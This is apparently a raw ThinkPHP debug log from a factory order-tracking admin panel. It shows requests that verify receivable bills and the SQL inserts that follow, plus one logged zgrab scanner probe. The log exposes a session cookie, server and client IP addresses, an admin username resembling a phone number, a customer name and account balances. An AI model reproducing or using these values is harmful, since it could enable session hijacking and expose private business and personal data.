LEFT JOIN `ot_orderinfo` `orderinfo` ON `outboundandorder`.`orderinfo_id`=`orderinfo`.`id` LEFT JOIN `ot_productinfo` `productinfo` ON `outboundandorder`.`productinfo_id`=`productinfo`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outboundandorder`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `outboundandorder`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_outbound` `outbound` ON `outboundandorder`.`outbound_id`=`outbound`.`id` WHERE `outbound`.`id` = '11827' [ RunTime:0.014261s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1154 LIMIT 1 [ RunTime:0.000386s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1157 LIMIT 1 [ RunTime:0.000323s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1069 LIMIT 1 [ RunTime:0.000383s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1021 LIMIT 1 [ RunTime:0.000245s ] [ sql ] [ SQL ] SELECT * FROM `ot_outbound` WHERE `id` = 11827 LIMIT 1 [ RunTime:0.000471s ] --------------------------------------------------------------- [ 2025-12-14T16:53:55+08:00 ] 106.112.204.117 GET /admin/ajax/lang?callback=define&controllername=financial.verifybill&v=1765702434 [ info ] 47.105.33.115:8081/admin/ajax/lang?callback=define&controllername=financial.verifybill&v=1765702434 [运行时间:0.030139s][吞吐率:33.18req/s] [内存消耗:3,850.14kb] [文件加载:71] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000038s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001126s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'ajax', 2 => 'lang', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill/hedui/ids/11827?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'callback' => 'define', 'controllername' => 'financial.verifybill', 'v' => '1765702434', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001470s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/ajax.php [ info ] [ RUN ] app\admin\controller\Ajax->lang[ /alidata/www/gendan/application/admin/controller/Ajax.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000096s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T16:53:56+08:00 ] 106.112.204.117 POST /admin/staffmge/kehu/getfackehu [ info ] 47.105.33.115:8081/admin/staffmge/kehu/getfackehu [运行时间:0.048858s][吞吐率:20.47req/s] [内存消耗:5,010.32kb] [文件加载:80] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000035s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001169s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'staffmge.kehu', 2 => 'getfackehu', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '158', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill/hedui/ids/11827?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'searchTable' => 'tbl', 'searchKey' => 'id', 'searchValue' => '286', 'orderBy' => array ( 0 => array ( 0 => 'name', 1 => 'ASC', ), ), 'showField' => 'name', 'keyField' => 'id', 'keyValue' => '286', 'searchField' => array ( 0 => 'name', ), ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001656s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/staffmge/kehu.php [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\staffmge\Kehu->getfackehu[ /alidata/www/gendan/application/admin/controller/staffmge/Kehu.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.006271s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000370s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.000750s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_kehu` WHERE `id` IN (286) AND ( factorymge_id =40 ) LIMIT 1 [ RunTime:0.000329s ] [ sql ] [ SQL ] SELECT * FROM `ot_kehu` WHERE `id` IN (286) AND ( factorymge_id =40 ) ORDER BY `name` ASC LIMIT 0,20 [ RunTime:0.000285s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.000637s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('' , '{\"searchTable\":\"tbl\",\"searchKey\":\"id\",\"searchValue\":\"286\",\"orderBy\":[[\"name\",\"ASC\"]],\"showField\":\"name\",\"keyField\":\"id\",\"keyValue\":\"286\",\"searchField\":[\"name\"]}' , '/admin/staffmge/kehu/getfackehu' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.204.117' , 1765702436) [ RunTime:0.004677s ] --------------------------------------------------------------- [ 2025-12-14T16:54:57+08:00 ] 20.163.14.140 GET /actuator/health [ info ] 47.105.33.115/actuator/health [运行时间:0.020553s][吞吐率:48.65req/s] [内存消耗:2,228.44kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000050s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001156s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'actuator', 1 => 'health', 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115', 'user-agent' => 'Mozilla/5.0 zgrab/0.x', 'accept' => '*/*', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T16:55:04+08:00 ] 106.112.204.117 POST /admin/financial/verifybill/hedui/ids/11827?dialog=1 [ info ] 47.105.33.115:8081/admin/financial/verifybill/hedui/ids/11827?dialog=1 [运行时间:0.134771s][吞吐率:7.42req/s] [内存消耗:6,199.59kb] [文件加载:94] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000038s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001263s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.verifybill', 2 => 'hedui', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '678', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill/hedui/ids/11827?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'dialog' => '1', 'kehu_id' => array ( 0 => '衡云飞', 1 => '286', ), 'verify_amount' => array ( 0 => '512', 1 => '512', 2 => '512', 3 => '1024', ), 'price' => array ( 0 => '9.2', 1 => '2.2200000000', 2 => '0.5000000000', 3 => '0.0400000000', ), 'money' => array ( 0 => '4710.4', 1 => '1136.6400000000', 2 => '256.0000000000', 3 => '40.9600000000', ), 'explain' => array ( 0 => '400W-3底壳512个', 1 => '400W-3上盖3印字512个', 2 => '400W-3散热器1512个', 3 => '大平压板1024个', ), 'shoukuan_status-1' => '0', 'shoukuan_status-2' => '0', 'shoukuan_status-3' => '0', 'shoukuan_status-4' => '0', 'ids' => '11827', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001662s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\financial\Verifybill->hedui[ /alidata/www/gendan/application/admin/controller/financial/Verifybill.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.007177s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000499s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.000843s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000437s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.000742s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,358,359,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001019s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000924s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000380s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outboundandorder` [ RunTime:0.000702s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.000951s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.000702s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.000691s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outbound` [ RunTime:0.000658s ] [ sql ] [ SQL ] SELECT `outboundandorder`.`id`,`outboundandorder`.`outbound_id`,`outboundandorder`.`orderinfo_id`,`outboundandorder`.`kehu_id`,`outboundandorder`.`amount`,`outboundandorder`.`money`,`outboundandorder`.`price`,`outboundandorder`.`productinfo_id`,`outboundandorder`.`factorymge_id`,`outboundandorder`.`staffinfo_id`,`outboundandorder`.`admin_id`,`outboundandorder`.`createtime`,`outboundandorder`.`updatetime`,`outboundandorder`.`verify_status`,`outboundandorder`.`verify_amount`,orderinfo.id AS orderinfo__id,orderinfo.nei_number AS orderinfo__nei_number,orderinfo.number AS orderinfo__number,orderinfo.pid AS orderinfo__pid,orderinfo.order_company AS orderinfo__order_company,orderinfo.order_connect AS orderinfo__order_connect,orderinfo.order_phone AS orderinfo__order_phone,orderinfo.kehu_id AS orderinfo__kehu_id,orderinfo.price AS orderinfo__price,orderinfo.material_id AS orderinfo__material_id,orderinfo.pProductinfo_id AS orderinfo__pProductinfo_id,orderinfo.productinfo_id AS orderinfo__productinfo_id,orderinfo.order_type AS orderinfo__order_type,orderinfo.order_status AS orderinfo__order_status,orderinfo.all_order_status AS orderinfo__all_order_status,orderinfo.shengchan_status AS orderinfo__shengchan_status,orderinfo.zuixinshuoming AS orderinfo__zuixinshuoming,orderinfo.guzhangshu AS orderinfo__guzhangshu,orderinfo.zuixinguzhang AS orderinfo__zuixinguzhang,orderinfo.techprocess_id AS orderinfo__techprocess_id,orderinfo.actual_amount AS orderinfo__actual_amount,orderinfo.kucun_amount AS orderinfo__kucun_amount,orderinfo.produce_amount AS orderinfo__produce_amount,orderinfo.produced_amount AS orderinfo__produced_amount,orderinfo.waste_amount AS orderinfo__waste_amount,orderinfo.produced_time AS orderinfo__produced_time,orderinfo.send_amount AS orderinfo__send_amount,orderinfo.ruku_posi AS orderinfo__ruku_posi,orderinfo.sent_amount AS orderinfo__sent_amount,orderinfo.out_time AS orderinfo__out_time,orderinfo.build_order_staffid AS orderinfo__build_order_staffid,orderinfo.factorymge_id AS orderinfo__factorymge_id,orderinfo.admin_id AS orderinfo__admin_id,orderinfo.remind_day AS orderinfo__remind_day,orderinfo.build_time AS orderinfo__build_time,orderinfo.end_time AS orderinfo__end_time,orderinfo.responsible_staffinfos AS orderinfo__responsible_staffinfos,orderinfo.responsible_staffinfovars AS orderinfo__responsible_staffinfovars,orderinfo.feedback AS orderinfo__feedback,orderinfo.guoqitime AS orderinfo__guoqitime,orderinfo.guoqi_status AS orderinfo__guoqi_status,orderinfo.put_position AS orderinfo__put_position,orderinfo.createtime AS orderinfo__createtime,orderinfo.updatetime AS orderinfo__updatetime,orderinfo.is_modify AS orderinfo__is_modify,orderinfo.purchaseorder_id AS orderinfo__purchaseorder_id,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,outbound.id AS outbound__id,outbound.number AS outbound__number,outbound.kehu_id AS outbound__kehu_id,outbound.total_money AS outbound__total_money,outbound.buildstaff_id AS outbound__buildstaff_id,outbound.staffinfo_id AS outbound__staffinfo_id,outbound.factorymge_id AS outbound__factorymge_id,outbound.complete_status AS outbound__complete_status,outbound.admin_id AS outbound__admin_id,outbound.is_print AS outbound__is_print,outbound.createtime AS outbound__createtime,outbound.updatetime AS outbound__updatetime FROM `ot_outboundandorder` `outboundandorder` LEFT JOIN `ot_orderinfo` `orderinfo` ON `outboundandorder`.`orderinfo_id`=`orderinfo`.`id` LEFT JOIN `ot_productinfo` `productinfo` ON `outboundandorder`.`productinfo_id`=`productinfo`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outboundandorder`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `outboundandorder`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_outbound` `outbound` ON `outboundandorder`.`outbound_id`=`outbound`.`id` WHERE `outbound`.`id` = '11827' [ RunTime:0.014948s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=512,`price`=9.2,`money`=4710.4 WHERE `id` = 27810 [ RunTime:0.005419s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_accountsreceivable` [ RunTime:0.001306s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000414s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (286 , 40 , 53556 , 1154 , 11827 , 27810 , 1 , 2025 , 12 , 14 , '400W-3底壳512个' , 1765702504 , 4710.4 , 11065972.190661) [ RunTime:0.004361s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=512,`price`=2.22,`money`=1136.64 WHERE `id` = 27811 [ RunTime:0.004248s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000440s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (286 , 40 , 53557 , 1157 , 11827 , 27811 , 1 , 2025 , 12 , 14 , '400W-3上盖3印字512个' , 1765702504 , 1136.64 , 11067108.830661) [ RunTime:0.003756s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=512,`price`=0.5,`money`=256 WHERE `id` = 27812 [ RunTime:0.005492s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000475s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (286 , 40 , 53564 , 1069 , 11827 , 27812 , 1 , 2025 , 12 , 14 , '400W-3散热器1512个' , 1765702504 , 256 , 11067364.830661) [ RunTime:0.005110s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=1024,`price`=0.04,`money`=40.96 WHERE `id` = 27813 [ RunTime:0.005216s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000403s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (286 , 40 , 53565 , 1021 , 11827 , 27813 , 1 , 2025 , 12 , 14 , '大平压板1024个' , 1765702504 , 40.96 , 11067405.790661) [ RunTime:0.004874s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.000849s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('跟单系统 财务管理 校对应收账款 核对' , '{\"dialog\":\"1\",\"kehu_id\":[\"\\u8861\\u4e91\\u98de\",\"286\"],\"verify_amount\":[\"512\",\"512\",\"512\",\"1024\"],\"price\":[\"9.2\",\"2.2200000000\",\"0.5000000000\",\"0.0400000000\"],\"money\":[\"4710.4\",\"1136.6400000000\",\"256.0000000000\",\"40.9600000000\"],\"explain\":[\"400W-3\\u5e95\\u58f3512\\u4e2a\",\"400W-3\\u4e0a\\u76d63\\u5370\\u5b57512\\u4e2a\",\"400W-3\\u6563\\u70ed\\u56681512\\u4e2a\",\"\\u5927\\u5e73\\u538b\\u677f1024\\u4e2a\"],\"shoukuan_status-1\":\"0\",\"shoukuan_status-2\":\"0\",\"shoukuan_status-3\":\"0\",\"shoukuan_status-4\":\"0\",\"ids\":\"11827\"}' , '/admin/financial/verifybill/hedui/ids/11827?dialog=1' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.204.117' , 1765702504) [ RunTime:0.005072s ] --------------------------------------------------------------- [ 2025-12-14T16:55:04+08:00 ] 106.112.204.117 GET /admin/financial/verifybill/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%22start_time%22%3A%222025-11-14+00%3A00%3A00%22%2C%22end_time%22%3A%222025-12-14+23%3A59%3A59%22%7D&op=%7B%22start_time%22%3A%22%3D%22%2C%22end_time%22%3A%22%3D%22%7D&_=1765701970988 [ info ] 47.105.33.115:8081/admin/financial/verifybill/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%22start_time%22%3A%222025-11-14+00%3A00%3A00%22%2C%22end_time%22%3A%222025-12-14+23%3A59%3A59%22%7D&op=%7B%22start_time%22%3A%22%3D%22%2C%22end_time%22%3A%22%3D%22%7D&_=1765701970988 [运行时间:0.254978s][吞吐率:3.92req/s] [内存消耗:5,710.02kb] [文件加载:88] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000036s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001111s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.verifybill', 2 => 'index', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/json', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'sort' => 'id', 'order' => 'desc', 'offset' => '0', 'limit' => '10', 'filter' => '{"start_time":"2025-11-14 00:00:00","end_time":"2025-12-14 23:59:59"}', 'op' => '{"start_time":"=","end_time":"="}', '_' => '1765701970988', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001447s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\financial\Verifybill->index[ /alidata/www/gendan/application/admin/controller/financial/Verifybill.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000147s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000528s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.000770s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000428s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.000649s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,358,359,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.000946s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000828s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000360s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outbound` [ RunTime:0.000693s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.000621s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outboundandorder` [ RunTime:0.000979s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM ( SELECT `outbound`.`id`,`outbound`.`number`,`outbound`.`kehu_id`,`outbound`.`total_money`,`outbound`.`buildstaff_id`,`outbound`.`staffinfo_id`,`outbound`.`factorymge_id`,`outbound`.`complete_status`,`outbound`.`admin_id`,`outbound`.`is_print`,`outbound`.`createtime`,`outbound`.`updatetime`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,outboundandorder.id AS outboundandorder__id,outboundandorder.outbound_id AS outboundandorder__outbound_id,outboundandorder.orderinfo_id AS outboundandorder__orderinfo_id,outboundandorder.kehu_id AS outboundandorder__kehu_id,outboundandorder.amount AS outboundandorder__amount,outboundandorder.money AS outboundandorder__money,outboundandorder.price AS outboundandorder__price,outboundandorder.productinfo_id AS outboundandorder__productinfo_id,outboundandorder.factorymge_id AS outboundandorder__factorymge_id,outboundandorder.staffinfo_id AS outboundandorder__staffinfo_id,outboundandorder.admin_id AS outboundandorder__admin_id,outboundandorder.createtime AS outboundandorder__createtime,outboundandorder.updatetime AS outboundandorder__updatetime,outboundandorder.verify_status AS outboundandorder__verify_status,outboundandorder.verify_amount AS outboundandorder__verify_amount,count(*) FROM `ot_outbound` `outbound` LEFT JOIN `ot_factorymge` `factorymge` ON `outbound`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outbound`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_outboundandorder` `outboundandorder` ON `outbound`.`id`=`outboundandorder`.`outbound_id` WHERE ( outbound.createtime > 1763049600 ) AND ( outbound.createtime <= 1765727999 ) 